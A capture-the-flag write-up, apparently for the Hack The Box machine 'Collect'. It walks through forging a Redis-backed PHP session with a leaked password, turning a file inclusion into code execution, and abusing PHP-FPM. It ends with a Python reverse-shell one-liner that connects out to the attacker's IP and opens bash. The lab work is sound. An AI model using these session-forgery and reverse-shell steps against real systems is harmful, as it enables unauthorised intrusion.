The host developers.colloect.htb requires us to be authenticated through HTTP authentication.
$ curl http://developers.collect.htb
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at developers.collect.htb Port 80</address>
</body></html>
Forum
The virtual host forum.collect.htb hosts a forum powered by MyBB.
In a thread, we found an attachment that can be downloaded via a valid account.
The content of the attachment is generated by the BurpSuite with base64 encoded request/response payload.
Admin Role
We see a relevant URL collect.htb/set/role/admin in the file.
By inspecting the file bootstrap.php, we see that the site uses Redis to manage sessions, refer to session.save_hander.
Redis Session Handler
We can authenticate to the Redis server using nc with password COLLECTR3D1SPASS found above.
$ nc -v collect.htb 6379
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 10.129.228.126:6379.
AUTH COLLECTR3D1SPASS
+OK
We can manipulate our session data to be authenticated via the above Redis connection.
$nc -v collect.htb 6379
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 10.129.228.126:6379.
AUTH COLLECTR3D1SPASS
+OK
keys *
*2
$43
PHPREDIS_SESSION:2slrifhvc8652e7t8tg1116liq
$43
PHPREDIS_SESSION:3i95sto32sf9k15nqlll86emon
set "PHPREDIS_SESSION:3i95sto32sf9k15nqlll86emon" "auth|b:1;"
+OK
We can access the page and abuse the LFI now.
LFI to RCE
With full control of the PHP include path, we may try to upgrade the LFI ability to RCE via PHP filters.
As in the above article, we can get the RCE using a chain of PHP filters.
Lateral Movement
PHP-FPM
We first found the port 9000, which may be used by PHP-FPM, is opened on the localhost.
We can check if this port is used by php-fpm using ps and check the user running it is victor by checking the config www.conf under /etc/php/8.1/fpm/pool.d, refer to the documentation.
List of pool directives
With FPM you can run several pools of processes with different setting. These are settings that can be tweaked per pool.
... SNIP
user string
Unix user of FPM processes. This option is mandatory.
By uploading the Python script fpm.py, we can run commands under the user victor now.
We can use Python to get our reverse shell now.
(Cmd) python3 /tmp/fpm.py localhost /var/www/developers/index.php -c "<?php system(\"python3 -c 'import socket,pty,os;s=socket.socket();s.connect((\\\"10.10.14.6\\\",4444));[os.dup2(s.fileno(),i) for i in range(3)];pty.spawn(\\\"/bin/bash\\\");'\");?>"
Privilege Escalation
We found an Express app source code under the user victor's home directory and the app seems to be running under the user root.